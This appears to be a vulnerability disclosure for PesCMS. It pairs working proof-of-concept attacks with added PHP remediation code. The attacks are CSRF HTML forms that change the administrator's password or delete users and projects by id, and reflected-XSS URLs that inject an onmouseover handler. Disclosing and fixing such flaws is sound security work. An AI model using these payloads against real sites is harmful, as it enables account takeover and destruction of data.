Technical Description:
File:
pescms/App/Team/PUT/User.php
This file modifies the user's personal information, but it does not verify that the operation is legitimate (there is no CSRF protection). Through it an attacker can modify the administrator's password, mail, phone and avatar image.
Proof of Concept(PoC)
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
<input type="hidden" name="method" value="PUT" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="mail" value="123456@qq.com" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="password" value="newadmin" />
<input type="hidden" name="home" value="Team-Index-index" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Success. The administrator's password has been modified.
Technical Description:
File:
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
Through it, any member or administrator can be deleted just by modifying the 'id' in the URL.
To delete the administrator account, it is only necessary to set the id to '1'.
Proof of Concept(PoC)
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
We refresh the list of users and find that the user called "light" has been deleted.
Technical Description:
File:
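The delete action above takes the target id straight from the URL with no check on who is asking. The following is an added example (not PesCMS code) of a server-side authorization guard for such a DELETE handler: it parses the id strictly, refuses non-administrators, protects the built-in administrator and the caller's own account, and writes an audit line so that refused attempts are detectable. The role names, the SUPER_ADMIN_ID constant, the audit-log path and the callback signatures are assumptions for illustration.

```php
<?php
// Added example, not PesCMS code: authorization for the DELETE user action.
// SUPER_ADMIN_ID, ROLE_ADMIN and the log path are assumed values.

const SUPER_ADMIN_ID = 1;        // assumed id of the built-in administrator
const ROLE_ADMIN     = 'admin';  // assumed role label

// Strict parsing of the id parameter: only a positive decimal integer.
function parse_target_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Decide whether $actor (the logged-in user) may delete account $targetId.
// Returns null when allowed, otherwise a human-readable refusal reason.
function delete_user_refusal(array $actor, int $targetId, ?array $target): ?string
{
    if (($actor['role'] ?? '') !== ROLE_ADMIN) {
        return 'only administrators may delete accounts';
    }
    if ($target === null) {
        return 'target account does not exist';
    }
    if ($targetId === SUPER_ADMIN_ID) {
        return 'the built-in administrator cannot be deleted';
    }
    if ($targetId === (int) ($actor['id'] ?? 0)) {
        return 'an account cannot delete itself';
    }
    return null;
}

// Append an audit record so every deletion attempt leaves a trace.
function audit_log(string $path, array $actor, $targetId, string $outcome): void
{
    $line = sprintf("%s actor=%d target=%s outcome=%s\n",
        date('c'), (int) ($actor['id'] ?? 0), var_export($targetId, true), $outcome);
    file_put_contents($path, $line, FILE_APPEND | LOCK_EX);
}

// Handler skeleton for ?g=Team&m=User&a=action&method=DELETE&id=...
// $findUser(int): ?array and $deleteUser(int): void are assumed data-layer callbacks.
function handle_delete_user(array $actor, array $query, callable $findUser,
                            callable $deleteUser, string $auditPath): int
{
    $targetId = parse_target_id($query['id'] ?? null);
    if ($targetId === null) {
        audit_log($auditPath, $actor, $query['id'] ?? null, 'refused: invalid id');
        return 400;
    }
    $refusal = delete_user_refusal($actor, $targetId, $findUser($targetId));
    if ($refusal !== null) {
        audit_log($auditPath, $actor, $targetId, 'refused: ' . $refusal);
        return 403;
    }
    $deleteUser($targetId);
    audit_log($auditPath, $actor, $targetId, 'deleted');
    return 200;
}

// Constructed demonstration data (not taken from a real PesCMS database).
$users  = [1 => ['id' => 1, 'role' => 'admin'], 36 => ['id' => 36, 'role' => 'member']];
$member = ['id' => 36, 'role' => 'member'];
$admin  = ['id' => 1, 'role' => 'admin'];
$find   = function (int $id) use (&$users) { return $users[$id] ?? null; };
$del    = function (int $id) use (&$users) { unset($users[$id]); };
$log    = sys_get_temp_dir() . '/pescms-delete-audit.log';

// A member trying to delete the administrator, the administrator trying to
// delete the protected account, and a legitimate deletion of user 36.
echo handle_delete_user($member, ['id' => '1'],  $find, $del, $log), "\n";
echo handle_delete_user($admin,  ['id' => '1'],  $find, $del, $log), "\n";
echo handle_delete_user($admin,  ['id' => '36'], $find, $del, $log), "\n";
```

The guard belongs in the controller before the data layer is touched; combined with a CSRF token check it closes both the "anyone can pick an id" and the "a forged cross-site form can submit the request" paths.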
pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php
Deleting important data through CSRF is possible in all of these files.
None of the delete operations are verified on the front end (no CSRF token is required). Like this:
Proof of Concept(PoC)
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Other delete operations also exist in this CMS; we only give their positions and do not prove each one.
In lines 72-78, the data from $_GET['begin'] and $_GET['end'] is assigned to variables and output directly in the page.
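Both the profile-update PoC (PUT/User.php) and the delete PoCs above work because the server accepts any well-formed POST, including the tunneled method=PUT / method=DELETE parameter, without proof that the user's own page issued it. The following is an added example (not PesCMS code) of the synchronizer-token pattern that closes this: a per-session random token is embedded in every state-changing form and compared in constant time on every request that is not a plain read, with an Origin/Referer host check as a second signal. The function names and the $_SESSION key are assumptions for illustration.

```php
<?php
// Added example, not PesCMS code: CSRF protection for state-changing actions
// such as User/setting (PUT) and the various ...&method=DELETE actions.
// Function names and the 'csrf_token' session key are assumed.

session_start();

// Per-session token, created on first use with a CSPRNG.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to place inside every form that changes state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// True only when the submitted token equals the session token (constant time).
function csrf_token_valid(?string $submitted): bool
{
    if (empty($_SESSION['csrf_token']) || $submitted === null) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Second signal: a request whose Origin (or Referer) host differs from our
// own Host header is a forged cross-site request. Absent headers fall back
// to the token check alone.
function origin_allowed(?string $origin, ?string $referer, string $hostHeader): bool
{
    $source = $origin ?? $referer;
    if ($source === null || $source === '') {
        return true;
    }
    $expected = strtolower(explode(':', $hostHeader)[0]);
    $actual   = parse_url($source, PHP_URL_HOST);
    return is_string($actual) && strtolower($actual) === $expected;
}

// The CMS tunnels PUT/DELETE through a "method" parameter, so the guard must
// fire on anything that is not a plain GET, and on GETs that carry a tunneled
// method as well.
function is_state_changing_request(string $httpMethod, array $params): bool
{
    $tunneled = is_string($params['method'] ?? null) ? strtoupper($params['method']) : '';
    return strtoupper($httpMethod) !== 'GET'
        || in_array($tunneled, ['PUT', 'DELETE', 'POST'], true);
}

// Call once in the dispatcher before any action (User/setting, User/action,
// Project/action, ...) is executed.
function enforce_csrf(): void
{
    $params = $_GET + $_POST;
    if (!is_state_changing_request($_SERVER['REQUEST_METHOD'] ?? 'GET', $params)) {
        return;
    }
    $tokenOk  = csrf_token_valid($_POST['csrf_token'] ?? null);
    $originOk = origin_allowed(
        $_SERVER['HTTP_ORIGIN'] ?? null,
        $_SERVER['HTTP_REFERER'] ?? null,
        $_SERVER['HTTP_HOST'] ?? ''
    );
    if (!$tokenOk || !$originOk) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
}

// Usage: enforce_csrf(); at the top of the action dispatcher, and
// echo csrf_field(); inside each form template that posts a change.
```

The token must be tied to the session and never placed in a URL (where it leaks through Referer), and the check must not be skipped for the tunneled methods, since the PoC forms in this report send method=DELETE in the query string of an ordinary POST.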
Proof of Concept(PoC)
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or, on the allExtract page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0
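The payload shape in these URLs (a double quote followed by an event handler) shows that begin and end are echoed inside a quoted HTML attribute. The following is an added example (not PesCMS code) that places the vulnerable rendering pattern beside a hardened version: the values are validated against the date format a report range should have, and encoded with htmlspecialchars(ENT_QUOTES) at the output point so a quote character can no longer close the attribute. The template fragment, the function names and the YYYY-MM-DD format are assumptions for illustration.

```php
<?php
// Added example, not PesCMS code: safe handling of the begin/end report
// filters. The input markup and the date format are assumed.

// Vulnerable pattern as the advisory describes it: raw query values echoed
// into an attribute, so a value containing a double quote breaks out of it.
function render_range_unsafe(string $begin, string $end): string
{
    return '<input name="begin" value="' . $begin . '" />'
         . '<input name="end" value="' . $end . '" />';
}

// Attribute-context encoding: ENT_QUOTES encodes both quote characters,
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_range_safe(string $begin, string $end): string
{
    return '<input name="begin" value="' . html_attr($begin) . '" />'
         . '<input name="end" value="' . html_attr($end) . '" />';
}

// Allow-list validation: a report boundary is either empty or a real
// calendar date in YYYY-MM-DD form (round-trip check rejects 2024-02-30).
function valid_date_or_empty(string $value): bool
{
    if ($value === '') {
        return true;
    }
    $d = DateTime::createFromFormat('!Y-m-d', $value);
    return $d !== false && $d->format('Y-m-d') === $value;
}

// What the extract/allExtract handlers should do: take the parameters as
// strings only, validate, then render with encoding.
function report_range_from_query(array $query): array
{
    $begin = is_string($query['begin'] ?? null) ? $query['begin'] : '';
    $end   = is_string($query['end'] ?? null) ? $query['end'] : '';
    if (!valid_date_or_empty($begin) || !valid_date_or_empty($end)) {
        return ['status' => 400, 'html' => '<p>Invalid date range.</p>'];
    }
    return ['status' => 200, 'html' => render_range_safe($begin, $end)];
}

// Constructed input using the payload shape from the advisory URLs.
$payload = '"onmouseover=alert(1)//';
echo "unsafe:  " . render_range_unsafe($payload, '') . "\n";
echo "encoded: " . render_range_safe($payload, '') . "\n";
print_r(report_range_from_query(['begin' => $payload, 'end' => '']));
print_r(report_range_from_query(['begin' => '2024-01-01', 'end' => '2024-01-31']));
```

Validation alone is not sufficient (a later template change could echo the value in another context), and encoding alone still lets malformed ranges reach the report query; doing both at the boundary and at the output point is the usual fix.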